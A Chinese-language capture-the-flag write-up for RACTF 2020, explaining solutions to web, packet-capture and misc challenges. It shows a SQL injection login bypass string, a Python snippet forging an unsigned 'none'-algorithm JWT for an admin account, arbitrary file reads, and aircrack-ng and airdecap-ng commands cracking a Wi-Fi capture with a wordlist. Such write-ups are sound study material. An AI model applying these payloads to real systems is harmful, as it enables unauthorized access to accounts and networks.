[RACTF 2020]Write-Up

web题目都比较简单


C0llide?

给了源码

const bodyParser = require("body-parser")
const express = require("express")
const fs = require("fs")
const customhash = require("./customhash")

const app = express()
app.use(bodyParser.json())

const port = 3000
const flag = "flag"
const secret_key = "Y0ure_g01nG_t0_h4v3_t0_go_1nto_h4rdc0r3_h4ck1ng_m0d3"

app.get('/', (req, res) => {
    console.log("[-] Source view")
    res.type("text")
    return fs.readFile("index.js", (err,data) => res.send(data.toString().replace(flag, "flag")))
})

app.post('/getflag', (req, res) => {
    console.log("[-] Getflag post")
    if (!req.body) {return res.send("400")}
    let one = req.body.one
    let two = req.body.two
    console.log(req.body)
    if (!one || !two) {
        return res.send("400")
    }
    if ((one.length !== two.length) || (one === two)) {
        return res.send("Strings are either too different or not different enough")
    }
    one = customhash.hash(secret_key + one)
    two = customhash.hash(secret_key + two)
    if (one == two) {
        console.log("[*] Flag get!")
        return res.send(flag)
    } else {
        return res.send(`${one} did not match ${two}!`)
    }
})

app.listen(port, () => console.log(`Listening on port ${port}`))

简单的post一个数组即可,注意是json格式的

ractf{Y0u_R_ab0uT_2_h4Ck_t1Me__4re_u_sur3?}


Quarantine

题目描述:See if you can get access to an account on the webapp.

使用:’ or 1 limit 1,1–登陆拿到flag

Finding server information

题目描述:See if you can find the source, we think it’s called app.py

点开视频发现源码返回了base64后的值,所以尝试改成app.py

拿到flag

Getting admin

题目描述:See if you can get an admin account.

jwt加密为空,伪造admin

import jwt

a=jwt.encode({"user":"admin","privilege":2},key='',algorithm='none').decode(encoding='utf-8')
print(a)

拿到flag


Entrypoint

题目描述:

Sadly it looks like there wasn’t much to see in the python source. We suspect we may be able to login to the site using backup credentials, but we’re not sure where they might be. Encase the password you find in ractf{...} to get the flag.

This challenge does NOT have fake flags. If you found some other flags while solving this challenge, you may have found the solutions to the next challenges first 😛

这是一个系列的题,本题在源码可以发现任意文件读取,读取backup.txt,即可获得flag

Admin Attack

题目描述:Looks like we managed to get a list of users. That admin user looks particularly interesting, but we don’t have their password. Try and attack the login form and see if you can get anything.

随便测试下发现返回了sql语句报错,是python写的

尝试各种构造,发现limit函数可以直接用。所以

‘ or 1 limit 1,1–+ 拿到一个flag

Baiting

题目描述:That user list had a user called loginToGetFlag. Well, what are you waiting for?

本题和上面做法一样,limit改数字即可

Insert witty name

题目描述:Having access to the site’s source would be really useful, but we don’t know how we could get it. All we know is that the site runs python.

本题通过任意文件读取读main.py拿到flag

Vandalism

题目描述:That admin panel was awfully bare. There must be some other page, but we’ve no idea where it is. Just to clarify, ractf{;)} is the greedy admins stealing all the flags, it’s not the actual flag.

登陆时在headers发现

访问查看源码发现是Unicode编码和ascii的混合

写个脚本遍历下ascii

import requests
import string

url='http://88.198.219.20:12539/__adminPortal'

cookie = {
    'session':'b6cb5d28-1742-4827-a510-ebdb116ed80f'
}
s=string.printable
result=requests.get(url=url,cookies=cookie).text
data=result.split('<h3 style="display:none">')
for i in data[1]:
    if i in s:
        print(i,end='')
    else:
        pass

跑出来就是flag

Xtremely Memorable Listing

题目描述:We’ve been asked to test a web application, and we suspect there’s a file they used to provide to search engines, but we can’t remember what it used to be called. Can you have a look and see what you can find?

根据题目名称,可以猜测是xml

所以使用xml字典扫下发现

下载bak

访问得到flag


Peculiar Packet Capture

流量分析题。下载后发现是Wi-Fi的流量分析,使用

aircrack-ng WiFi.cap

得到Wi-Fi的SSID

使用命令

aircrack-ng 1.cap -w /usr/share/wordlists/rockyou.txt

得到WI-FI密码

进行解密

airdecap-ng 1.cap -e ATLAS_PMC -p nighthawk

得到解密后的数据包。导出pdf得到flag


MISC-Teleport

给了python脚本

import math

x = 0.0
z = 0.0
flag_x = 10000000000000.0
flag_z = 10000000000000.0
print("Your player is at 0,0")
print("The flag is at 10000000000000, 10000000000000")
print("Enter your next position in the form x,y")
print("You can move a maximum of 10 metres at a time")
for _ in range(100):
    print(f"Current position: {x}, {z}")
    try:
        move = input("Enter next position(maximum distance of 10): ").split(",")
        new_x = float(move[0])
        new_z = float(move[1])
    except Exception:
        continue
    diff_x = new_x - x
    diff_z = new_z - z
    dist = math.sqrt(diff_x ** 2 + diff_z ** 2)
    if dist > 10:
        print("You moved too far")
    else:
        x = new_x
        z = new_z
    if x == 10000000000000 and z == 10000000000000:
        print("ractf{#####################}")
        break

发现用了强转float(),搜了一下该函数的手册

https://www.geeksforgeeks.org/float-in-python/

发现此函数不仅可以接收字符串,还可以inf,nan这样的参数,

测试发现,在输入nan,nan 时后再次输入相应的参数即可拿到flag

发表评论

电子邮件地址不会被公开。 必填项已用*标注